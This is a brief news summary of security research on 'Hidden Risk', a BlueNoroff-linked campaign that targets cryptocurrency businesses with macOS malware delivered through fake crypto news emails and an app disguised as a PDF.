SentinelLabs researchers identified a North Korea-linked threat actor targeting crypto businesses with new macOS malware as part of a campaign called 'Hidden Risk'. The attackers, linked to BlueNoroff, used fake cryptocurrency news emails and a malicious app disguised as a PDF to deliver multi-stage malware. The malware uses a novel persistence technique exploiting the Zsh configuration file to bypass macOS security notifications. The campaign has been active since July 2024 and shows BlueNoroff's continued focus on targeting the crypto and Web3 sectors with evolving tactics.